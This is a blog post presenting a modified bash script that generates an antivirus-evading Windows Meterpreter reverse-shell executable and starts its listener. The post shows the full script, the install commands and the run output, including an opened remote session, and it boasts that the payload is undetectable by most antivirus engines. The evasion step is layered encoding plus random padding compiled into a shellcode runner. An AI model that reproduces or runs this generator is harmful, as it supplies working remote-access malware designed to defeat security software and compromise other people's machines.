Sunday, November 13, 2011

FUD Payload Generator for Backtrack

Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:
Select All Code:
#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
Select All Code:
rm -rf ShellCode
 
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
 
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E
In order to be able to compile the generated payload we must install the following packages:

Select All Code:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we must move our shell-script to default metasploit’s folder (/pentest/exploits/framework) and execute it:
Select All Code:
root@bt:/pentest/exploits/framework# chmod +x fud.sh 
root@bt:/pentest/exploits/framework# ./fud.sh 
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT         
                  By Astr0baby 2011                        
  With some Randomic gravy and sauce to bypass Antivirus    
    For Automatic Teensy programming and deployment         
************************************************************
Here is a network device list available on yor machine
 lo:
 eth0:
What network interface are we gonna use ?  eth0
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
 
20210.exe ...generated in ShellCode subfolder
20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe
      starting the meterpreter listener...
Since we have created our payload we will try to check if it works:
Select All Code:
root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe 
fixme:system:SetProcessDPIAware stub!
fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)
fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)
wine: configuration in '/root/.wine' has been updated.
fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
fixme:toolhelp:Heap32ListFirst : stub
Select All Code:
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
AutoRunScript => migrate2 explorer.exe
[*] Started reverse handler on 192.168.200.22:443 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.200.22
[*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200
 
meterpreter > ps
 
Process list
============
 
 PID  Name            Arch  Session  User                      Path
 ---  ----            ----  -------  ----                      ----
 12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
 17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
 33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
 8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe
 
meterpreter > sysinfo
Computer        : bt
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Now our payload is fully undetectable from most of antivirus engines. Of course we can try to scan it using online services such as novirusthanks:

Credits go to Astr0baby

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...